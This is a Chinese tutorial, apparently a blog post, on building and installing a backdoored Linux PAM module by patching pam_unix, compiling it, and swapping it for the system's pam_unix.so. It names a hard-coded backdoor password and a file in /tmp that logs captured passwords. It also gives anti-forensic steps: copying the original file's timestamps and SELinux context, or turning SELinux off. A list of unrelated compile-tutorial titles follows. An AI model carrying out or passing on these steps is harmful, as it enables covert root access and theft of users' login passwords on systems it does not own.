linux-pam 编译,PAM后门编译安装
PAM有许多版本,我们首先要从官方下载目标所使用的PAM源码包,并在本地修改后编译生成出pam_unix.so文件进行替换
http://www.linux-pam.org/library/
https://fedorahosted.org/releases/l/i/linux-pam/
获取目标系统所使用的PAM版本:rpm -qa|grep pam
下载后,在对应的系统环境下(32或x86_64位系统下)编译生成后门,patch目录下的“pam_unix_auth.c.patch”文件就是
补丁文件,pam_unix_auth.c 是PAM
1.1.1版本pam_unix.so的源文件,仅作参考。我们将补丁文件移动到源码目录,并使用patch命令对PAM源代码打补丁,然后编译生成即可。
mv pam_unix_auth.c.patch Linux-PAM-1.1.1/modules/pam_unix/
cd Linux-PAM-1.1.1/modules/pam_unix
patch
cd ../../
./configure & make
编译完后的文件在:modules/pam_unix/.libs/pam_unix.so
后门的默认密码:root123
记录密码的文件:/tmp/pslog
将生成的pam_uninx.so文件覆盖/lib/secruity/pam_unix.so或/lib64/security/pam_unix.so(记得备份原始文件),修改文件属性,手动建立密码保存文件,并使用touch命令克隆文件时间,如果selinux是开启的环境,一定要关掉或者设置好上下文pam_unix.so才能正常工作,搞定ok。
手动创建密码文件:touch /tmp/pslog;chmod a+w /tmp/pslog
克隆原始文件时间:touch pam_unix.so -r pam_unix.so.src
查看Selinux上下文:ls -Z pam_unix.so.src (备份的原始文件)
设置Selinux上下文:chcon –reference=pam_unix.so.src pam_unix.so
编译报错问题:
64位系统编译可能会遇到yywrap()函数未定义错误,只需安装flex软件包就可以正常编译了
示例:
yum install flex
下载地址:
1感谢乌云某个兄弟
2不要在骂我了
linux-pam 编译,PAM后门编译安装相关推荐
- Linux 之旅 21:编译安装软件
Linux 之旅 21:编译安装软件 图源:pexcel 开源软件的安装与升级 可执行文件 通常,源代码只有被编译成二进制的可执行文件后才能在操作系统上被用户直接运行,比如: [icexmoon@xy ...
- Linux下boost库的编译、安装详解
1.下载源文件 去官网下载:http://www.boost.org/ 这里下载最新版本 wget https://dl.bintray.com/boostorg/release/1.64.0/sou ...
- Linux下通过源码编译安装程序
本文简单的记录了下,在Linux下如何通过源码安装程序,以及相关的知识. 一.程序的组成部分 Linux下程序大都是由以下几部分组成: 二进制文件:也就是可以运行的程序文件 库文件:就是通常我们见到的 ...
- 深入理解Linux软件包的配置、编译与安装
深入理解Linux软件包的配置.编译与安装 发布时间:2007.09.24 06:23 来源:赛迪网 作者:kit 从源代码安装过软件的朋友一定对 ./configure & ...
- linux内核配置与编译,LINUX内核的配置与编译、安装
LINUX内核的配置与编译.安装 平台为VM RHEL 5.1 SERVER,所用的内核为linux-2.6.25. 可以到上下载相应的内核版本. 解压压缩包,并进入内核目录.下面是具体的步骤: 1. ...
- 文件系统层次结构标准和Linux上下载源代码配置编译安装
一.文件系统层次结构标准 FHS_3.0 标准文档 /bin 存储一些二进制可执行命令文件, /usr/bin 也存放了一些基于用户的命令文件. /sbin 存储了很多系统命令, /usr/sbin ...
- linux源码编译安装lamp环境搭建,linux下源码包编译安装LAMP环境
1.下载所需的源码包 Httpd-2.4.10 apr-1.5.1 apr-util-1.5.3 pcre-8.33(这些均可在Apache官网进行下载) Mysql-5.5.39 php ...
- Linux系统的PAM模块认证文件含义说明总结
在Linux中执行有些程序时,这些程序在执行前首先要对启动它的用户进行认证,符合一定的要求之后才允许执行,例如login, su等.在Linux中进行身份或是状态的验证程序是由PAM来进行的,PAM( ...
- linux 编译opencl,OpenCL编译环境配置(VS+Nvidia)
英伟达的显卡首先要下载安装CUDA开发包,可以参考这里的步骤: VS2015编译环境下CUDA安装配置 安装好CUDA之后,OpenCL的配置就已经完成了80%了,剩下的工作就是把OpenCL的路 ...
- linux编译树莓派内核,编译树莓派 4B Linux 5.9 内核
来自 九年吃菜粥 的发帖. 文中的操作是在 x86 docker 的 Ubuntu 容器中进行操作,因为子系统编译时好像 CPU 吃不满. 文中命令全部用 root 用户执行. 1.首先下载树莓派的内 ...
最新文章
- 码农也能有春天:一个人独立运营网站12年,赚到了5亿多美元!
- spring之DelegatingFilterProxy
- Istio 1.3 发布:HTTP 遥测不再需要 Mixer
- javafx 调用java_Java,JavaFX的流畅设计风格拨动开关
- 重装mysql出现无法start service的问题
- 字符串2在字符串1中第一次出现的位置strstr()
- oracle rman和数据泵,使用RMAN或数据泵初始化OGG目标库
- 自学java 第十章内部类(二)
- Leetcode算法题(C语言)1
- 《大话设计模式》第29章-OOTV杯超级模式大赛—模式总结(一)
- 拆解拼多多、趣头条、小红书背后的上海互联网基因
- 电脑快捷键(键盘不灵了赶紧使用快捷键)
- 最新Spring Boot视频教程附代码笔记资料(50G)
- 如何把Word的默认页面颜色由白色改为绿色
- deepin20如何换源_Deepin更换镜像源
- oracle为什么打开鼠标不见了,鼠标箭头突然不见了该怎么办呢?
- 活猫还是死猫?| 薛定谔的猫 | 儿童故事
- SSL证书背后的加密技术--非对称加密和对称加密
- 【Proteus仿真】51单片机+PCA9685 16路舵机控制
- 计算机学业水平考试 高中会考,解读高中学业水平考试与高中会考区别